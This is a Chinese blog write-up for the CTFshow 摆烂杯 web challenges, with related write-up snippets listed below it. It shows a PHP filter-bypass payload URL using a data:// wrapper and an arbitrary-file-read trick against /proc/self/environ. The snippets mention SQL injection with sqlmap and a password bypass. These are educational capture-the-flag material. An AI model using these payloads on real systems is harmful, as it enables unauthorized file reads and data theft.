[CTF]CTFSHOW摆烂杯 WEB WP

最新推荐文章于 2024-06-03 23:03:56 发布
最新推荐文章于 2024-06-03 23:03:56 发布
阅读量2.3k 收藏 1
点赞数
分类专栏: CTF 文章标签: 前端 php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Sapphire037/article/details/122134518
版权

一行代码

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-11-18 21:25:22
# @Last Modified by:   h1xa
# @Last Modified time: 2021-11-18 22:14:12
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/
echo !(!(include "flag.php")||(!error_reporting(0))||stripos($_GET['filename'],'.')||($_GET['id']!=0)||(strlen($_GET['content'])<=7)||(!eregi("ctfsho".substr($_GET['content'],0,1),"ctfshow"))||substr($_GET['content'],0,1)=='w'||(file_get_contents($_GET['filename'],'r') !== "welcome2ctfshow"))?$flag:str_repeat(highlight_file(__FILE__), 0);

很多个条件都要满足,拆分来仔细看就行,并不难
http://e7df25cc-b994-4b15-b08e-a901738bfa9c.challenge.ctf.show/?filename=data://text/plain,welcome2ctfshow&id=0&content=Wasdasdasdasdad

黑客网站

后缀onion,多百度一下就知道了

web签到

1
1
1)+110+(1

登陆不了

验证码处存在任意文件读取,直接读/proc/self/environ就能看到flag

登陆不了_revenge

预期方法群里有发,非预期是赛后羽师傅说的,读/proc/1/environ就能读到…

Sapphire037
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow摆烂杯 比烂为主】
chuxuezhewocao的博客
06-02 931
ctfshow摆烂杯 比烂为主
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
ctfshow 摆烂杯web wp
Lum1n0us's Blog
12-27 3239
考试前不想复(预)习,正好是ctfshow的摆烂杯,就去做了几道web题 文章目录web签到黑客网站一行代码 web签到 题目要输入三个整数A、B、C,ABC均不可为0,让A³+B³+C³=114,刚开始还想着爆破,后面感觉到太慢了,开始随便输,发现输入1+1后会把他当成2来计算,那就很好办了,直接让输入数的幂为1/3即可 A=5&B=-1&C=-10**(1/3) 后面看群才知道。。 幸亏没爆破 黑客网站 f12后发现一堆字符串,题目也说了不用渗透和扫描,说明关键点就是这些字符串,.
ctfshow web1-14 萌新赛wp
最新发布
weixin_56546651的博客
06-03 462
经过MySQL编码后会变成’or’6xxx,使SQL恒成立,相当于万能密码,可以绕过md5()函数的加密。经过测试发现题目过滤了空格,使用/**/绕过空格,其余与WEB 2解法相同。经过测试,发现过滤很多,学习借鉴别的师傅写出的python脚本试试。尝试常见的弱口令admin/admin/admin123等无反应。手工尝试SQL注入未果,抓包保存为txt丢给sqlmap同样未果。经过测试,同样仅过滤了空格,同WEB 2。进行目录爆破,发现robots.txt。在多次尝试未果后翻看了别的师傅的wp
[ctfshow 2021摆烂杯] WEB部分 writeup
ShenZ的博客
01-24 1057
[ctfshow 2021摆烂杯] WEB部分 writeup web签到 一行代码 黑客网站 登陆不了 1.读一些敏感文件 2.利用web.xml写jsp???? 官方的wp:https://qgieod1s9b.feishu.cn/docs/doccnC4EpMhSv1Ni6mbL7BQQdBc
[RoarCTF 2019]Easy Java(web.xml)
weixin_45577185的博客
07-30 223
wp链接 WEB-INF主要包含一下文件或目录: /WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。 /WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中 /WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件 /WEB-INF/src/:源码目录,按照包名结
【2021摆烂杯web
记录学习,一起进步
05-08 905
摆烂杯web wp
CtfHub-wpweb
01-23
本文主要探讨了CTF(Capture The Flag)竞赛中与Web安全相关的知识点,通过解决一系列问题,我们可以学习到如何发现和利用网站的漏洞获取关键信息。首先,提到了通过查找网站的备份文件来获取线索,例如在URL后添加...
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
2018上海CTF“骇极杯”逆向WP
11-12
2018上海CTF“骇极杯”逆向WP2018上海CTF“骇极杯”逆向WP
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow摆烂杯
qq_29634299的博客
12-26 784
摆烂杯 一行代码 POST /?filename=php://input&id=0&content=Ww234567811 HTTP/1.1 Host: b5ea7e47-c730-441e-87fd-dfe2aa8c3011.challenge.ctf.show User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,applic
ctfshow摆烂杯(卑微wp日记)
BL_zshaom的博客
01-04 471
一、一行代码 首先审题: echo !(!(include "flag.php") ||(!error_reporting(0)) ||stripos($_GET['filename'],'.') ||($_GET['id']!=0) ||(strlen($_GET['content'])<=7) ||(!eregi("ctfsho".substr($_GET['content'],0,1),"ctfshow")) ||substr($_GET['content'],0,1)=='w
ctfshow web
m0_73239569的博客
03-04 849
记录刷题
Hackthebox系列 ctf首页无法登录
xujing19920814的博客
10-24 1307
https://ctf.hackthebox.com/无法登录
ctfshow摆烂杯--绀青之拳
aarong的博客
12-26 773
就只有这题最有思路,其他题都不会,直接摆了。 QR扫码: 进入蓝奏云,获得flag.txt文件: 文件内容: 联想到是emoji编码加密,所以找到了emoji-aes,需要key来解码 继续分析,可能有隐藏信息在刚刚那个二维码中,kali中用binwalk检测,果然藏了一张jpg图片: foremost 分离: 得到这张图片,叫我看题目,题目名是绀青之拳,是柯南剧场版的一部电影,难道要在电影里面找key?我去,无异于大海捞针。 肯定还有其他信息,使用StepSolve再次打开那个二维码文件,查看
CTFshow-web -入门签到
pone2233的博客
12-15 1462
CTFshow Web web签到题 F12 web2 先抓包然后按照流程跑 把之前抓取的数据复制到sqlmap根目录下test.txt内 保存完成后开始跑数据库名 python2 sqlmap.py -r test.txt --dbs 跑数据库内数据表 python2 sqlmap.py -r test.txt -D web2 --tables 查看字段 python2 sqlmap.py -r test.txt -D web2 -T flag --columns [ 查询字段内容 p
ctfshow 摆烂杯
zip471642048的博客
12-27 1374
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
ctfshow 摆烂杯 writeup
mumuzi的博客
12-26 3608
ctfshow摆烂杯 writeup
ctfshow菜狗杯web
09-07
ctfshow菜狗杯web是一个CTF比赛中的一个项目,其中包含了多个题目和挑战。其中有一个题目叫做"web2 c0me_t0_s1gn",这是一个需要进行签到的题目。 在这个题目中,源码中没有对number2进行正则匹配校验,所以number2...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值